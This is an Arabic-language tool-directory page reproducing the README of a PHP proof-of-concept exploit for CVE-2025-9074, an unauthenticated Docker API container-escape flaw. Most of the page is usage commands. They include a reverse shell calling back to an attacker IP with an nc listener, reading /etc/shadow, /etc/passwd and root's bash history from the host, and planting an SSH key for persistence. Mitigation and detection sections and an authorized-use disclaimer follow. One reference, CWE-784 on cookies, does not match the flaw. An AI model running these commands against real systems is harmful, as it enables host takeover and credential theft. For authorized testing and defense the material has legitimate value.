Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-9074 — PoC بلغة PHP، استغلال لـ CVE-2025-9074 | Kitploit
أدوات/GitHubGitHub/c0gnit00/cve-2025-9074
تصعيد الامتيازاتتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةما بعد الاستغلالاختبار الاختراقأمن السحابةالقيادة والسيطرةأداة الوصول عن بعدالهروب من الحاوية
5منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
c0gnit00/cve-2025-9074

CVE-2025-9074

PoC بلغة PHP، استغلال لـ CVE-2025-9074

عرض المستودع

CVE-2025-9074: ثغرة RCE غير مصادق عليها في Docker Engine API

الخطورة: حرجة | درجة CVSS: 9.8 (تقديرية) | الإصدارات المتأثرة: Docker Desktop < 4.44.3

استغلال إثبات مفهوم (PoC) لثغرة CVE-2025-9074، وهي ثغرة تنفيذ أوامر عن بُعد غير مصادق عليها في Docker Engine API تتيح الهروب من الحاويات المميزة (privileged containers) واختراق النظام المضيف.

🔴 نظرة عامة على الثغرة

CVE-2025-9074 هي ثغرة حرجة في Docker Desktop تعرّض Docker Engine API دون مصادقة مناسبة أو عزل شبكي. وهذا يسمح للمهاجمين عن بُعد بـ:

  • تنفيذ أوامر تعسفية بصلاحيات مرتفعة
  • الهروب من عزل الحاوية والوصول إلى نظام ملفات المضيف
  • إنشاء اتصالات قشرة عكسية (reverse shell) بأنظمة يتحكم بها المهاجم
  • اختراق مضيف الحاوية بالكامل ونظام تشغيل المضيف الأساسي

ناقل الهجوم

  • التعرض الشبكي: تعرّض Docker API على واجهات الشبكة (عادةً المنفذ 2375/TCP)
  • غياب المصادقة: تقبل الواجهة الطلبات دون مصادقة
  • الحاويات المميزة: القدرة على إنشاء حاويات مميزة مع وصول إلى نظام ملفات المضيف
  • وحدات التثبيت الرابطة (Bind Mounts): وصول مباشر إلى نظام ملفات المضيف عبر مسارات bind mount

📋 المتطلبات

  • PHP CLI (7.0+)
  • تمكين إضافة curl في PHP
  • اتصال شبكي بنقطة نهاية Docker API المكشوفة
  • Docker Desktop < 4.44.3 (الإصدار القابل للاستغلال)

متطلبات النظام للهدف

تؤثر الثغرة على:

  • Docker Desktop for Windows < 4.44.3
  • Docker Desktop for Mac < 4.44.3
  • Docker Engine (عند تعرضه دون TLS)

🚀 بدء سريع

التثبيت

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-9074.git
cd CVE-2025-9074

الاستخدام الأساسي

تنفيذ أمر واحد على مضيف Docker:

root@kitploit:~
php poc.php -u http://192.168.65.7:2375 -m cmd -c "whoami"

القشرة العكسية

إنشاء قشرة عكسية تفاعلية:

root@kitploit:~
# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Run exploit
php poc.php -u http://192.168.65.7:2375 -m reverse -l 10.10.14.36 -p 4444

📖 دليل الاستخدام

صيغة الأمر

root@kitploit:~
php poc.php -u <url> [options]

الخيارات

الوضع: تنفيذ الأوامر

تنفيذ أوامر مفردة على الهدف:

root@kitploit:~
# Simple command
php poc.php -u http://192.168.65.7:2375 -m cmd -c "id"

# Read files from host
php poc.php -u http://192.168.65.7:2375 -m cmd -c "cat /mnt/hostfs/flag.txt" --cleanup

# With cleanup
php poc.php -u http://192.168.65.7:2375 -m cmd -c "whoami" --cleanup

الوضع: القشرة العكسية

تشغيل قشرة تفاعلية مع استدعاء عكسي (callback):

root@kitploit:~
php poc.php -u http://192.168.65.7:2375 -m reverse -l 192.168.1.100 -p 4444

أمثلة خاصة بكل نظام تشغيل

هدف Linux

root@kitploit:~
php poc.php -u http://target:2375 -m cmd -c "cat /mnt/hostfs/etc/shadow" --os linux

هدف Windows

root@kitploit:~
php poc.php -u http://target:2375 -m cmd -c "dir C:\" --os windows

هدف macOS

root@kitploit:~
php poc.php -u http://target:2375 -m cmd -c "ls -la /mnt/hostfs/Users/" --os mac

🎯 سيناريوهات الاستغلال الواقعية

1. الاستطلاع

root@kitploit:~
# Enumerate host system
php poc.php -u http://192.168.65.7:2375 -m cmd -c "uname -a"
php poc.php -u http://192.168.65.7:2375 -m cmd -c "whoami"

2. جمع بيانات الاعتماد

root@kitploit:~
# Extract sensitive files
php poc.php -u http://192.168.65.7:2375 -m cmd -c "cat /mnt/hostfs/root/.bash_history"
php poc.php -u http://192.168.65.7:2375 -m cmd -c "cat /mnt/hostfs/etc/passwd"

3. الثبات (Persistence)

root@kitploit:~
# Add SSH key
php poc.php -u http://192.168.65.7:2375 -m cmd -c "mkdir -p /mnt/hostfs/root/.ssh && echo 'SSH_KEY' >> /mnt/hostfs/root/.ssh/authorized_keys"

4. الحركة الجانبية

root@kitploit:~
# Enumerate running containers and networks
php poc.php -u http://192.168.65.7:2375 -m cmd -c "docker ps --all"

🔍 التفاصيل التقنية

آلية الثغرة

  1. Docker Socket/API مكشوف: يستمع Docker API على 0.0.0.0:2375 دون مصادقة
  2. إنشاء حاويات مميزة: ينشئ PoC حاويات مميزة عبر /containers/create
  3. ربط نظام ملفات المضيف: تستخدم الحاويات bind mounts للوصول إلى نظام ملفات المضيف:
    • Linux: /:/mnt/hostfs
    • macOS: /:/mnt/hostfs
    • Windows: /mnt/host/c:/mnt/hostfs
  4. تنفيذ الأوامر: تُنفَّذ الأوامر بصلاحيات root/SYSTEM داخل الحاوية
  5. الوصول إلى نظام ملفات المضيف: وصول مباشر للقراءة/الكتابة إلى مسارات /mnt/hostfs

تدفق الحمولة (Payload)

root@kitploit:~
┌─────────────────────────────────────────────────────┐
│ poc.php (Your Machine)                               │
└────────────┬────────────────────────────────────────┘
             │ HTTP REST API Call
             ▼
┌─────────────────────────────────────────────────────┐
│ Docker API (Target Port 2375) [UNAUTHENTICATED]     │
└────────────┬────────────────────────────────────────┘
             │ Creates Container
             ▼
┌─────────────────────────────────────────────────────┐
│ Privileged Alpine Container                          │
│ ├─ Full Root Access                                 │
│ ├─ Bind Mount: /:/mnt/hostfs                       │
│ └─ Executes Attacker Command                        │
└────────────┬────────────────────────────────────────┘
             │ Command Output
             ▼
┌─────────────────────────────────────────────────────┐
│ Output Returned to Attacker                          │
└─────────────────────────────────────────────────────┘

تحليل الكود

  • التفاعل مع Docker API: يستخدم cURL للتواصل مع REST API عبر HTTP/1.1
  • فك تعدد إرسال سجلات Docker: يتعامل بشكل صحيح مع تنسيق التدفق متعدد الإرسال (multiplexed stream) الخاص بـ Docker
  • دعم متعدد المنصات: يكييّف مسارات bind mount لـ Windows/Mac/Linux
  • معالجة المهلة الزمنية: مهلة 60 ثانية للأوامر طويلة التشغيل

🛡️ التخفيف

إجراءات فورية

  1. ترقية Docker Desktop

    root@kitploit:~
    # Update to version 4.44.3 or later
    
  2. العزل الشبكي

    • قصر منفذ Docker API (2375) على localhost فقط
    • استخدام قواعد جدار الحماية لمنع الوصول الخارجي
    • تعطيل كشف مقبس Docker API
  3. تفعيل مصادقة TLS

    root@kitploit:~
    # Configure Docker daemon with TLS certificates
    # In daemon.json:
    {
      "tlsverify": true,
      "tlscacert": "/etc/docker/ca.pem",
      "tlscert": "/etc/docker/server-cert.pem",
      "tlskey": "/etc/docker/server-key.pem"
    }
    
  4. تقسيم الشبكة

    • تشغيل Docker Desktop على شبكات معزولة
    • تنفيذ وصول شبكي قائم على نموذج الثقة المعدومة (zero-trust)
    • استخدام VPN للوصول عن بُعد

إعدادات Docker Desktop

  • Windows/Mac: عطّل خيار "Expose daemon on tcp://localhost:2375"
  • استخدم مقبس Unix (/var/run/docker.sock) للوصول المحلي فقط
  • تنفيذ المصادقة عبر Docker Context مع بيانات الاعتماد

📊 الكشف

الكشف الشبكي

root@kitploit:~
# Scan for exposed Docker APIs
nmap -p 2375,2376 -sV target_network

# Check if port responds to Docker API
curl -s http://target:2375/version

كشف السجلات

  • مراقبة سجلات Docker daemon بحثًا عن استدعاءات API غير معتادة
  • التنبيه عند إنشاء حاويات مميزة
  • تتبع أنماط استخدام bind mount

⚠️ إخلاء مسؤولية

تُقدَّم هذه الأداة لأغراض اختبار الأمان المصرح به والتعليم فقط.

  • استخدم هذا الـ PoC فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها
  • الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني
  • يتحمل المستخدمون المسؤولية الكاملة عن أفعالهم
  • هذا الـ PoC مخصص لاختبار الاختراق المصرح به وبحوث الثغرات الأمنية

📝 المراجع

  • أمان Docker Engine
  • توثيق Docker API
  • تفاصيل CVE-2025-9074
  • CWE-784: الاعتماد على ملفات تعريف الارتباط دون تحقق مناسب

🤝 المساهمة

المساهمات مرحب بها! لا تتردد في إرسال المشكلات (issues) أو طلبات السحب (pull requests).

📄 الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.

👤 المؤلف

باحث أمني | مختبِر اختراق


آخر تحديث: مايو 2025 | الحالة: بحث نشط

تنزيل الأداة
OptionShortRequiredDescription
--url-u✅ نعمعنوان Docker API (مثال: http://1.2.3.4:2375)
--mode-m❌ لاوضع التنفيذ: cmd أو reverse (الافتراضي: cmd)
--cmd-c⚠️ لوضع cmdالأمر المراد تنفيذه على الهدف
--lhost-l⚠️ للوضع العكسيعنوان IP الخاص بك لاستقبال الاتصال
--lport-p❌ لامنفذ الاستماع لديك (الافتراضي: 4444)
--os—❌ لانظام تشغيل الهدف: linux, mac, windows (الافتراضي: linux)
--cleanup—❌ لاإزالة الحاوية بعد التنفيذ
--help-h❌ لاعرض رسالة المساعدة